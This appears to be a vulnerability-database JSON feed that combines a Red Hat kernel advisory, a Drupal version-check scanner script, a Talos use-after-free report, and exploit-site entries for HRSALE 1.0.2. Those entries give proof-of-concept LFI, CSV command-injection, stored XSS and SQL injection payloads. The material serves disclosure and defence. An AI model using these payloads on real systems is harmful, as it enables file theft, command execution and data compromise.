"kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.18-348.39.1.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i386", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-348.39.1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-348.39.1.el5.i686.rpm", 
"operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of 
instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant CVE-2017-5715 triggers the speculative execution by utilizing branch target injection. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall and guest/host boundaries and read privileged memory by conducting targeted cache side-channel attacks. (CVE-2017-5715, Important, x86-64)\n\n* kernel: exec/ptrace: get_dumpable() incorrect tests (CVE-2013-2929, Low)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Google Project Zero for reporting CVE-2017-5715.\n\nBug Fix(es):\n\n* The Return Trampolines (Retpolines) mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. With this update, the support for Retpolines has been implemented into the Red Hat Enterprise Linux kernel. 
(BZ#1539655)", "reporter": "RedHat", "published": "2018-04-26T00:09:30", "type": "redhat", "title": "(RHSA-2018:1252) Important: kernel security and bug fix update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-2929", "CVE-2017-5715"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-26T00:11:33", "id": "RHSA-2018:1252", "href": "https://access.redhat.com/errata/RHSA-2018:1252", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-04-26T03:28:11", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "8bitsec", "published": "2018-04-26T00:00:00", "title": "HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion Vulnerability", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10260"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30256", "href": "https://0day.today/exploit/description/30256", "sourceData": "# Exploit Title: HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion\r\n# Exploit Author: 8bitsec\r\n# CVE: CVE-2018-10260\r\n# Vendor Homepage: https://codecanyon.net/\r\n# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619\r\n# Version: 1.0.2\r\n# Tested on: [Kali Linux 2.0 | Mac OS 10.13]\r\n \r\nRelease Date:\r\n=============\r\n2018-04-23\r\n \r\nProduct & Service Introduction:\r\n===============================\r\nHRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.\r\n \r\nTechnical Details & Description:\r\n================================\r\n \r\nLocal File Inclusion vulnerability found while logged in as a low-privileged user.\r\n \r\nProof of Concept (PoC):\r\n=======================\r\n \r\nLFI:\r\n \r\nhttp://localhost/[path]/admin/download?type=task&filename=../../../../../../../../etc/passwd\n\n# 0day.today [2018-04-26] #", "cvss": {"score": 
0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30256"}, {"lastseen": "2018-04-26T03:28:34", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "8bitsec", "published": "2018-04-26T00:00:00", "title": "HRSALE The Ultimate HRM v1.0.2 - CSV Injection Vulnerability", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10257"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30254", "href": "https://0day.today/exploit/description/30254", "sourceData": "# Exploit Title: HRSALE The Ultimate HRM 1.0.2 - CSV Injection\r\n# Exploit Author: 8bitsec\r\n# CVE: CVE-2018-10257\r\n# Vendor Homepage: https://codecanyon.net/\r\n# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619\r\n# Version: 1.0.2\r\n# Tested on: [Kali Linux 2.0 | Mac OS 10.13]\r\n \r\nRelease Date:\r\n=============\r\n2018-04-23\r\n \r\nProduct & Service Introduction:\r\n===============================\r\nHRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.\r\n \r\nTechnical Details & Description:\r\n================================\r\n \r\nA user is able to inject a command that will be included in the exported CSV file.\r\n \r\nProof of Concept (PoC):\r\n=======================\r\n \r\n1. Login with employee user credentials\r\n2. Browse to My Profile and add =cmd|'/C calc'!A1 into the First Name field\r\n3. Log in with admin's credentials\r\n4. Browse to Core HR > Employees Last Login\r\n5. 
Click on the CSV button to download and open the exported CSV file\n\n# 0day.today [2018-04-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30254"}, {"lastseen": "2018-04-26T03:27:42", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "8bitsec", "published": "2018-04-26T00:00:00", "title": "HRSALE The Ultimate HRM 1.0.2 - Authenticated Cross-Site Scripting Vulnerability", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10259"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30255", "href": "https://0day.today/exploit/description/30255", "sourceData": "# Exploit Title: HRSALE The Ultimate HRM 1.0.2 - Authenticated Cross Site Scripting\r\n# Exploit Author: 8bitsec\r\n# CVE: CVE-2018-10259\r\n# Vendor Homepage: https://codecanyon.net/\r\n# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619\r\n# Version: 1.0.2\r\n# Tested on: [Kali Linux 2.0 | Mac OS 10.13]\r\n \r\nRelease Date:\r\n=============\r\n2018-04-23\r\n \r\nProduct & Service Introduction:\r\n===============================\r\nHRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.\r\n \r\nTechnical Details & Description:\r\n================================\r\n \r\nAuthenticated Stored XSS vulnerability found while logged in as a low-privileged user.\r\n \r\nProof of Concept (PoC):\r\n=======================\r\n \r\nAuthenticated Stored XSS:\r\n \r\nDashboard > My Profile. 
Write the payload on the 'First Name' input field:\r\njohn doe<script>alert()</script>\n\n# 0day.today [2018-04-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30255"}, {"lastseen": "2018-04-26T03:27:53", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "8bitsec", "published": "2018-04-26T00:00:00", "title": "HRSALE The Ultimate HRM v1.0.2 - award_id SQL Injection Vulnerability", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10256"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30257", "href": "https://0day.today/exploit/description/30257", "sourceData": "# Exploit Title: HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection\r\n# Exploit Author: 8bitsec\r\n# CVE: CVE-2018-10256\r\n# Vendor Homepage: https://codecanyon.net/\r\n# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619\r\n# Version: 1.0.2\r\n# Tested on: [Kali Linux 2.0 | Mac OS 10.13]\r\n \r\nRelease Date:\r\n=============\r\n2018-04-23\r\n \r\nProduct & Service Introduction:\r\n===============================\r\nHRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.\r\n \r\nTechnical Details & Description:\r\n================================\r\n \r\nSQL injection on [award_id] parameter.\r\n \r\nProof of Concept (PoC):\r\n=======================\r\n \r\nSQLi:\r\n \r\nhttps://localhost/[path]/admin/user/read_awards/?jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS\r\n \r\nParameter: award_id (GET)\r\n Type: boolean-based blind\r\n Title: AND boolean-based blind - WHERE or HAVING clause\r\n Payload: jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS\n\n# 0day.today [2018-04-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30257"}], 
"openvas": [{"lastseen": "2018-04-26T09:40:33", "references": ["https://www.drupal.org/sa-core-2018-004"], "pluginID": "1361412562310141028", "description": "Drupal is prone to a remote code execution vulnerability.", "edition": 1, "reporter": "This script is Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-04-26T00:00:00", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) - (Linux, Version Check)", "type": "openvas", "enchantments": {}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-04-26T00:00:00", "id": "OPENVAS:1361412562310141028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141028", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_lin.nasl 9615 2018-04-26 01:50:36Z ckuersteiner $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) - (Linux, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141028\");\n script_version(\"$Revision: 9615 $\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-04-26 03:50:36 +0200 (Thu, 26 Apr 2018) $\");\n script_tag(name: \"creation_date\", value: \"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name: \"qod_type\", value: \"remote_banner_unreliable\");\n\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) - (Linux, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n\n script_tag(name: \"summary\", value: \"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name: \"vuldetect\", value: \"Checks the version.\");\n\n script_tag(name: \"insight\", value: \"A remote code execution vulnerability exists within multiple subsystems of\nDrupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\ncould result in the site being compromised. 
This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name: \"affected\", value: \"Drupal 7.x and 8.x\");\n\n script_tag(name: \"solution\", value: \"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name: \"URL\", value: \"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\",\n exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "talos": [{"lastseen": "2018-04-26T17:45:02", "references": [], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0527\n\n## Hyland Perceptive Document Filters DOCX to HTML Code Execution Vulnerability\n\n##### April 26, 2018\n\n##### CVE Number\n\nCVE-2018-3844 \n\n### Summary\n\nAn exploitable use after free exists in the DOCX to HTML conversion functionality of the Hyland Perceptive Document Filters version 11.4.0.2647. 
A crafted DOCX document can lead to a use-after-free resulting in direct code execution.\n\n### Tested Versions\n\nPerceptive Document Filters 11.4.0.2647 - x86/x64 Windows/Linux\n\n### Product URLs\n\n<https://www.hyland.com/en/perceptive#docfilters>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nThis vulnerability is present in the Hyland Document filter conversion which is used for big data, eDiscovery, DLP, email archival, content management, business intelligence and intelligent capture services. \nIt can convert common formats such as Microsoft's document formats into more usable and easily viewed formats. There is a vulnerability in the conversion process of a DOCX document to HTML. A specially crafted DOCX file can lead to a use-after-free and remote code execution. Let\u2019s investigate this vulnerability. After we attempt to convert a malicious DOCX using the Hyland library we see the following state:\n \n \n //page heap is turned on +hpa\n windbg.exe isys_doc2text.exe --html malicious.docx\n \n (448c.13a8): Access violation - code c0000005 (first/second chance not available)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n Time Travel Position: 31815B:0\n eax=289aaff0 ebx=289aaff0 ecx=24f40f90 edx=62f058a0 esi=00000080 edi=63299690\n eip=62f058ac esp=0084e148 ebp=0084e150 iopl=0 nv up ei pl zr na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246\n ISYSreadershd!IGR_ImageExport+0x2c084c:\n 62f058ac 8b01 mov eax,dword ptr [ecx] ds:002b:24f40f90=63123300\n \n\nShowing more context\n \n \n 62f058a0 55 push ebp\n 62f058a1 8bec mov ebp,esp\n 62f058a3 8b4904 mov ecx,dword ptr [ecx+4]\n 62f058a6 ff750c push dword ptr [ebp+0Ch]\n 62f058a9 ff7508 push dword ptr [ebp+8]\n 62f058ac 8b01 mov eax,dword ptr [ecx]\n 62f058ae ff5008 call dword ptr [eax+8]\n 62f058b1 33c9 xor ecx,ecx\n 62f058b3 3b450c 
cmp eax,dword ptr [ebp+0Ch]\n 62f058b6 0f94c0 sete al\n 62f058b9 5d pop ebp\n 62f058ba c20800 ret 8\n \n\nWe see an obvious attempt at a virtual function call on a previously freed object. Further examination confirms our assumptions:\n \n \n 0:000> !heap -p -a ecx\n address 24f40f90 found in\n _DPH_HEAP_ROOT @ 167b1000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 29892208: 24f40000 2000\n 641bab22 verifier!AVrfDebugPageHeapFree+0x000000c2\n 77845958 ntdll!RtlDebugFreeHeap+0x0000003c\n 777f5c1d ntdll!RtlpFreeHeap+0x0005619d\n 7779fa0d ntdll!RtlFreeHeap+0x000007cd\n 63046591 ISYSreadershd!IGR_ImageExport+0x00401531\n 63010792 ISYSreadershd!IGR_ImageExport+0x003cb732\n 62b451f9 ISYSreadershd!IGR_HtmlExport+0x002f5c09\n 62aa3853 ISYSreadershd!IGR_HtmlExport+0x00254263\n 628e077d ISYSreadershd!IGR_HtmlExport+0x0009118d\n 62aa25b8 ISYSreadershd!IGR_HtmlExport+0x00252fc8\n 62aa36de ISYSreadershd!IGR_HtmlExport+0x002540ee\n 62aa389b ISYSreadershd!IGR_HtmlExport+0x002542ab\n 62849e59 ISYSreadershd+0x000a9e59\n 6284aa1b ISYSreadershd+0x000aaa1b\n 628486e8 ISYSreadershd+0x000a86e8\n 6399d749 isysreaders+0x001dd749\n 63999c2e isysreaders+0x001d9c2e\n 63e1edd3 ISYS11df!IGR_Open_Stream_Ex+0x000000b3\n 009b892f isys_doc2text+0x0002892f\n 009b71fb isys_doc2text+0x000271fb\n 009b612f isys_doc2text+0x0002612f\n 009e4c52 isys_doc2text+0x00054c52\n 009e2cc5 isys_doc2text+0x00052cc5\n 009bcf76 isys_doc2text+0x0002cf76\n 00a97f44 isys_doc2text+0x00107f44\n 748c8654 KERNEL32!BaseThreadInitThunk+0x00000024\n 777c4a77 ntdll!__RtlUserThreadStart+0x0000002f\n 777c4a47 ntdll!_RtlUserThreadStart+0x0000001b\n \n\nChecking the Linux version, we can obtain a bit more information from partial symbols:\n \n \n [----------------------------------registers-----------------------------------]\n RAX: 0x7ffff3104188 (:CSkiaStreamBridge+168>: 0x00007ffff2d612b0)\n RBX: 0x8 \n RCX: 0x0 \n RDX: 0x8 \n RSI: 0x7fffffffa590 --> 0xa1a0a0d474e5089 \n RDI: 0x6ea4e0 --> 0x6cf010 --> 0x0 \n RBP: 
0x6d6c30 --> 0x5 \n RSP: 0x7fffffffa560 --> 0x8 \n RIP: 0x7ffff2d60de8 (:CSkiaStreamBridge::write(void const*, unsigned long)+8>: 0x39481850ff078b48)\n R8 : 0x6 \n R9 : 0x0 \n R10: 0x6d6c30 --> 0x5 \n R11: 0x7ffff2be3950 --> 0x6c8948e8245c8948 \n R12: 0x7fffffffa590 --> 0xa1a0a0d474e5089 \n R13: 0x6d6c30 --> 0x5 \n R14: 0x0 \n R15: 0x7fffffffafb0 --> 0x7ffff3104188 (:CSkiaStreamBridge+168>: 0x00007ffff2d612b0)\n EFLAGS: 0x207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow)\n [-------------------------------------code-------------------------------------]\n 0x7ffff2d60de0 <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)>: push rbx\n 0x7ffff2d60de1 <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)+1>: mov rdi,QWORD PTR [rdi+0x18]\n 0x7ffff2d60de5 <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)+5>: mov rbx,rdx\n => 0x7ffff2d60de8 <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)+8>: mov rax,QWORD PTR [rdi]\n 0x7ffff2d60deb <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)+11>: call QWORD PTR [rax+0x18]\n 0x7ffff2d60dee <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)+14>: cmp rax,rbx\n 0x7ffff2d60df1 <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)+17>: pop rbx\n 0x7ffff2d60df2 <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)+18>: sete al\n [------------------------------------stack-------------------------------------]\n 0000| 0x7fffffffa560 --> 0x8 \n 0008| 0x7fffffffa568 --> 0x7ffff2be3980 --> 0x241c8b481374c084 \n 0016| 0x7fffffffa570 --> 0x6d6c30 --> 0x5 \n 0024| 0x7fffffffa578 --> 0x6d6c30 --> 0x5 \n 0032| 0x7fffffffa580 --> 0x64 ('d')\n 0040| 0x7fffffffa588 --> 0x7ffff2881736 --> 0x77020000026dbb80 \n 0048| 0x7fffffffa590 --> 0xa1a0a0d474e5089 \n 0056| 0x7fffffffa598 --> 0x68dd90 --> 0x7ffff5b62780 --> 0x44f2894902f98341 \n [------------------------------------------------------------------------------]\n Legend: code, data, rodata, 
value\n \n \n //Use After Free call stack\n #0 in ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned int) () from ./libISYSgraphics.so\n #1 in sk_write_fn(png_struct_def*, unsigned char*, unsigned int) () from ./libISYSgraphics.so\n #2 in png_write_data () from ./libISYSgraphics.so\n #3 in png_write_sig () from ./libISYSgraphics.so\n #4 in png_write_info_before_PLTE () from ./libISYSgraphics.so\n #5 in png_write_info () from ./libISYSgraphics.so\n #6 in SkPNGImageEncoder::doEncode(SkWStream*, SkBitmap const&, bool const&, int, int, SkBitmap::Config, png_color_8_struct&, SkImageEncoderDetails const*) () from ./libISYSgraphics.so\n #7 in SkPNGImageEncoder::onEncode(SkWStream*, SkBitmap const&, int, SkImageEncoderDetails const*) () from ./libISYSgraphics.so\n #8 in SkImageEncoder::encodeStream(SkWStream*, SkBitmap const&, int, SkImageEncoderDetails const*) () from ./libISYSgraphics.so\n #9 in SkImageEncoder::EncodeStream(SkWStream*, SkBitmap const&, SkImageEncoder::Type, int, SkImageEncoderDetails const*) () from ./libISYSgraphics.so\n #10 in CairoPNGCanvas::closeCanvas() () from ./libISYSreadershd.so\n #11 in common::EscherDraw::closeCanvas() () from ./libISYSreadershd.so\n #12 in TextHtmlWriter::addDrawing(intermediate::common::IDrawing*) () from ./libISYSreadershd.so\n #13 in TextHtmlWriter::writeParasRunObjects(std::list<intermediate::common::IObject*, std::allocator<intermediate::common::IObject*> >, double*, double*) () from ./libISYSreadershd.so\n #14 in TextHtmlWriter::writeParagraph(WriterBaseStream&, intermediate::common::ITextParagraph*, bool, bool, bool) () from ./libISYSreadershd.so\n #15 in TextHtmlWriter::writeParagraphs(intermediate::common::ITextDocumentContent const*, WriterBaseStream&) () from ./libISYSreadershd.so\n #16 in TextHtmlWriter::writeContent(intermediate::common::ITextDocumentContent const*) () from ./libISYSreadershd.so\n #17 in TextDocumentWriter::convert() () from ./libISYSreadershd.so\n #18 in 
ISYS_NS::LibraryHD::CDocument::processWriter(WriterBase*) () from ./libISYSreadershd.so\n #19 in ISYS_NS::LibraryHD::CDocument::openWord(ISYS_NS::CStream*, common::tools::XMLScanner::XMLScannerType) () from ./libISYSreadershd.so\n #20 in ISYS_NS::LibraryHD::CDocument::open(IGR_Stream*, int, wchar_t const*) () from ./libISYSreadershd.so\n #21 in ISYS_NS::LibraryHD::IGR_HDAPI_Open(IGR_Stream*, int, wchar_t const*, void**, wchar_t*) () from ./libISYSreadershd.so\n #22 in ISYS_NS::exports::IGR_Open_File_FromStream(wchar_t const*, wchar_t const*, ISYS_NS::CStream*, bool, ISYS_NS::exports::Ext_Open_Options*, int, wchar_t const*, int*, int*, void**, int*, int, Error_Control_Block*) () from ./libISYSreaders.so\n #23 in ISYS_NS::exports::IGR_Open_Stream_Ex(IGR_Stream*, int, unsigned short const*, int*, int*, void**, Error_Control_Block*) () from ./libISYSreaders.so\n #24 in IGR_Open_Stream_Ex () from ./libISYS11df.so\n #25 in processStream(std::string const&, tagTIGR_Stream*, bool, int, int, bool, std::ostream&, int, double) ()\n #26 in processFile(std::string const&, int, int, bool, std::ostream&) ()\n #27 in main ()\n \n\nTracking this object\u2019s life cycle we can see its creation inside `TextHtmlWriter::addDrawing` method:\n \n \n Object allocation call stack\n \n #0 in ISYS_NS::CTemporaryStream::CTemporaryStream(wchar_t const*, unsigned int) () from ./libISYSshared.so\n #1 in TextHtmlWriter::addDrawing(intermediate::common::IDrawing*) () from ./libISYSreadershd.so\n #2 in TextHtmlWriter::writeParasRunObjects(std::list<intermediate::common::IObject*, std::allocator<intermediate::common::IObject*> >, double*, double*) () from ./libISYSreadershd.so\n #3 in TextHtmlWriter::writeParagraph(WriterBaseStream&, intermediate::common::ITextParagraph*, bool, bool, bool) () from ./libISYSreadershd.so\n #4 in TextHtmlWriter::writeParagraphs(intermediate::common::ITextDocumentContent const*, WriterBaseStream&) () from ./libISYSreadershd.so\n #5 in 
TextHtmlWriter::writeContent(intermediate::common::ITextDocumentContent const*) () from ./libISYSreadershd.so\n #6 in TextDocumentWriter::convert() () from ./libISYSreadershd.so\n #7 in ISYS_NS::LibraryHD::CDocument::processWriter(WriterBase*) () from ./libISYSreadershd.so\n #8 in ISYS_NS::LibraryHD::CDocument::openWord(ISYS_NS::CStream*, common::tools::XMLScanner::XMLScannerType) () from ./libISYSreadershd.so\n #9 in ISYS_NS::LibraryHD::CDocument::open(IGR_Stream*, int, wchar_t const*) () from ./libISYSreadershd.so\n #10 in ISYS_NS::LibraryHD::IGR_HDAPI_Open(IGR_Stream*, int, wchar_t const*, void**, wchar_t*) () from ./libISYSreadershd.so\n #11 in ISYS_NS::exports::IGR_Open_File_FromStream(wchar_t const*, wchar_t const*, ISYS_NS::CStream*, bool, ISYS_NS::exports::Ext_Open_Options*, int, wchar_t const*, int*, int*, void**, int*, int, Error_Control_Block*) () from ./libISYSreaders.so\n #12 in ISYS_NS::exports::IGR_Open_Stream_Ex(IGR_Stream*, int, unsigned short const*, int*, int*, void**, Error_Control_Block*) () from ./libISYSreaders.so\n #13 in IGR_Open_Stream_Ex () from ./libISYS11df.so\n #14 in processStream(std::string const&, tagTIGR_Stream*, bool, int, int, bool, std::ostream&, int, double) ()\n #15 in processFile(std::string const&, int, int, bool, std::ostream&) ()\n #16 in main ()\n \n \n \n // libISYSreadershd image base : 0xF4AE6000\n .text:F4FA1060 TextHtmlWriter::addDrawing(intermediate::common::IDrawing *) proc near\n (...)\n text:F4FA1AFB push 0A00000h ; unsigned int\n .text:F4FA1B00 push 0 ; wchar_t *\n .text:F4FA1B02 push eax ; this\n .text:F4FA1B03 call ISYS_NS::CTemporaryStream::CTemporaryStream(wchar_t const*,uint) ; VULN OBJECT\n .text:F4FA1B08 mov dword ptr [esp], 10h ; unsigned int\n 